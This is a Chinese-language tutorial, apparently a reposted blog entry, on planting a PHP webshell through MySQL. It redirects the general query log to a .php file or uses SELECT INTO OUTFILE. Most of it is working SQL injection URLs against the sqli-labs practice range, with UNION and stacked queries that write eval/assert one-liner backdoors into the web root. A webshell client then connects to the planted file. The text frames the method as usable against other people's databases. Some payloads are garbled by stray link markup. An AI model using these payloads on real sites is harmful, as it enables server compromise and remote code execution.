日志写马条件1.全局变量general_log为ON MySQL的两个全局变量: general_log指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。 general_log_file 指的是日志的保存路径。 mysql> show global variables like '%general\_log%'; ------------------ -------------------------------------------------------- | Variable\_name | Value | ------------------ -------------------------------------------------------- | general\_log | OFF || general\_log_file | D:\\phpStudy\\PHPTutorial\\MySQL\\data\\DESKTOP-UQAMJKA.log | ------------------ -------------------------------------------------------- 2 rows in set (0.02 sec) 如果目前这个general_log为off状态,那么日志就没有被记录进去,所以要先打开这个全局变量。 set global general_log='on'; 打开过后,日志文件中就会记录我们写的sql语句。我这里用sqli-labs来进行执行sql语句: http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,3-- 打开D:\phpStudy\PHPTutorial\MySQL\data\DESKTOP-UQAMJKA.log日志文件,成功记录 注:不管sql语句是否正确都会记录进去。 不过general_log_file可以直接通过SQL语句修改,而且必须修改为比如php后缀的文件,不然马不能被解析。下面讲第2点条件会详细说明。 2.需要secure_file_priv为空,即secure_file_priv='';或者secure_file_priv为general_log_file 日志的保存路径的磁盘。不过general_log_file可以直接通过SQL语句修改,必须要修改为比如php后缀的文件,不然马不能被解析:
然后在D盘下就出现1.log成为新的日志文件了。但是最后也要考虑能不能成功的连接到马,像如果secure_file_priv固定为G:\,而网站是搭在D盘上,那把general_log_file修改为G盘下的文件也连接不到,除非还有文件包含漏洞等等。 show global variables like '%secure%';查看可以写入的磁盘。 secure_file_priv=””就是可以into outfile写入任意磁盘文件。 secure_file_priv设置通过设置my.ini来配置,不能通过SQL语言来修改,因为它是只读变量,secure_file_priv设置具体看这里: 若secure_auth为ON,则用以下方法变为OFF(mysql查询默认是不区分大小写的) secure_file_priv不能通过此方法修改,因为报错为Variable 'XXX’ is a read only variable。报错原因及修改方法为: 将secure_file_priv为空的正确方法(注意NULL不是我们要的空,NULL和空的类型不一样) 3.对web目录有写权限MS的系统就不说了,一般都会有权限的,但是linux的系统,通常都是rwxr-xr-x,也就是说组跟其他用户都没有权限写操作。 4.知道物理路径(into outfile '物理路径’), 这样才能写对目录。 查select @[@b](https://github.com/b '@b') asedir;——MySQL数据库安装的绝对路径: mysql> select @@b asedir; -------------------------------- | @@b asedir | -------------------------------- | D:/phpStudy/PHPTutorial/MySQL/ | -------------------------------- 1 row in set (0.07 sec) 5.(1)union注入在这里行不通。 因为要日志写马能够连接必须要修改general_log_file为比如php后缀的文件,不然马不能被解析。所以必须要先用到set global general_log_file='...php';,那么union注入就没机会了,union基本都是?id=1 union select 1,2,select '<?php assert($_POST[v]);?>';这样,不能执行set的。 (2)有堆叠注入,要先?id=1;set global general_log_file='...php';,然后直接执行?id=1;select '<?php assert($_POST[v]);?>'; 不过首先要想有堆叠注入的条件,源码中必须要用到mysqli_multi_query(),那么我们此处就可以执行多个sql语句进行注入。一般后台查询数据库使用的语句都是用mysql_query(),所以堆叠注入在mysql上不常见。mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句。 堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。 (3)再者就是已经成功登录到别人的数据库里了,要先set global general_log_file='...php';,然后直接执行select '<?php assert($_POST[v]);?>'; 6.对方没有对'和'进行过滤,因为outfile后面的物理路径必须要有引号 用法例子:直接登录进别人的数据库的时候:
或者堆叠注入: set global general\_log\_file='...php';?id=1;select '<?php assert($\_POST\[v\]);?>';或者直接?id=<?php assert($\_POST\[v\]);?>;都可以了,因为sql语句不管对错日志都会记录 过程这里展示下堆叠注入的日志写马过程,用的是sqli-labs的靶场: 实战中堆叠注入来日志写马就不能用show来看全局变量的值了,所以就直接用sql语句修改。 1.先设置general_log为on: http://127.0.0.1/sqli-labs-master/Less-38/?id=-1' union select 1,2,3;set global general_log='on';-- 2.再设置general_log_file为一个php后缀文件: http://127.0.0.1/sqli-labs-master/Less-38/?id=-1' union select 1,2,3;set global general_log_file='D:\\phpStudy\\PHPTutorial\\WWW\\log.php';-- 注:其中路径里的\用\\或者/代替,因为\的话会消失一个 在Navicat中查询可以看到真的被改了: 可以看到这里必须要知道网站的绝对路径了。 3.secure_file_priv设置只能通过设置my.ini来配置,不能直接通过SQL语句来修改,因为它是只读变量。而且这里也不能show来看,所以只能看缘分~ 4.http://127.0.0.1/sqli-labs-master/Less-38/?id=1';select '<?php assert($_POST[v]);?>';-- 或者直接?id=<?php assert($_POST[v]);?>;都可以了,因为sql语句不管对错日志都会记录 5.最后可以用shell管理工具来连接了。比如我这里用蚁剑成功了: 直接成功登录数据库的日志写马可以说是方法和堆叠注入的差不多,就是可以用show来看全局变量的值。这里就不赘述了。 mysql into outfile注射一句话木马条件关于mysql into outfile注射,要使用into outfile 把木马写到web目录拿到webshell首先需要有几个条件: 1.就是mysql用户拥有file_priv权限(不然就不能写文件或者读文件) show global variables like '%secure%';查看into outfile可以写入的磁盘。 secure_file_priv=””就是可以into outfile写入任意磁盘文件。 secure_file_priv设置通过设置my.ini来配置,不能通过SQL语言来修改,因为它是只读变量,secure_file_priv设置具体看这里: 若secure_auth为ON,则用以下方法变为OFF(mysql查询默认是不区分大小写的) secure_file_priv不能通过此方法修改,因为报错为Variable 'XXX’ is a read only variable。报错原因及修改方法为: 将secure_file_priv为空的正确方法(注意NULL不是我们要的空,NULL和空的类型不一样) 2.对web目录有写权限MS的系统就不说了,一般都会有权限的,但是linux的系统,通常都是rwxr-xr-x,也就是说组跟其他用户都没有权限写操作。 3.知道物理路径(into outfile '物理路径’), 这样才能写对目录。 查select @[@b](https://github.com/b '@b') asedir;——MySQL数据库安装的绝对路径:
4.(1)能够使用union 。(需要mysql 3以上的版本)这个条件是在url里才需要,如果直接登录进别人的数据库,那么就不需要能够使用union了 例子:?id=1 union select '<?php @e val($\_POST\['c'\]);?>' into outfile 'C:/phpStudy/WWW/a.php'?id=1')) UNION SELECT 1,2,'<?php @e val($\_POST\['v'\]);?>' into outfile 'D:\\\phpStudy\\\PHPTutorial\\\WWW\\\hack.php' -- (2)或者有堆叠注入,就可以直接?id=1;select '<?php [@e](https://github.com/e '@e') val($_POST['c']);?>' into outfile 'C:/phpStudy/WWW/a.php'这样执行了。 不过首先要想有堆叠注入的条件,源码中必须要用到mysqli_multi_query(),那么我们此处就可以执行多个sql语句进行注入。一般后台查询数据库使用的语句都是用mysql_query(),所以堆叠注入在mysql上不常见。mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句。 堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。 (3)再者就是已经成功登录到别人的数据库里了,直接执行select '<?php [@e](https://github.com/e '@e') val($_POST['c']);?>' into outfile 'C:/phpStudy/WWW/a.php' 5.对方没有对'和'进行过滤,因为outfile后面的物理路径必须要有引号 所以,要满足这几个条件还是蛮高难度的。 如果都满足,写入成功了,那么就可以用shell管理工具进行Getshell了 MySQL写入数据select into outfile一句话木马用法例子:直接登录进别人的数据库的时候:
在url里要用union: 例子:?id=1 union select '<?php @e val($\_POST\['c'\]);?>' into outfile 'C:/phpStudy/WWW/a.php'?id=1')) UNION SELECT 1,2,'<?php @e val($\_POST\['v'\]);?>' into outfile 'D:\\\phpStudy\\\PHPTutorial\\\WWW\\\hack.php' -- 或者堆叠注入:
注意其中路径里的\用\\或者/代替,因为\的话会消失一个 过程1.判断注入类型 http://127.0.0.1/sqli-labs-master/Less-7/?id=1' 报错 2.判断列数 http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 3 -- 正常 http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 4 -- 报错 说明存在3列 3.文件写入 1.判断注入类型 http://127.0.0.1/sqli-labs-master/Less-7/?id=1' 报错 2.判断列数 http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 3 -- 正常 http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 4 -- 报错 说明存在3列 3.文件写入 http://127.0.0.1/sqli-labs-master/Less-7?id=1')) UNION SELECT 1,2,'<?php [@e](https://github.com/e '@e') val($_POST['v']);?>' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\hack.php' -- 或者'D:/phpStudy/PHPTutorial/WWW/hack.php',就是不能\,经过测试这样导入不成功。 上面的图中报了错:You have an error in your SQL syntax,显示sql出错了,但是没有关系,我们可以在文件中看到hack.php已经生成了。 这时候用菜刀等webshell管理工具连接就可以了,我下面用的是蚁剑,可以看到连接成功。 堆叠注入:http://127.0.0.1/sqli-labs-master/Less-40/?id=1');SELECT '<?php [@e](https://github.com/e '@e') val($_POST['v']);?>' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\hack.php';-- 然后该目录下便生成了我们的马儿,用shell管理工具便可成功连接。从这里可以看到一定要知道网站的绝对路径。 直接成功登录数据库的into outfile写入一句话木马可以说是方法和前面两个的差不多,就是可以用show来看全局变量的值。这里就不赘述了。 |
|
来自: Fengsq501u81r4 > 《计算机》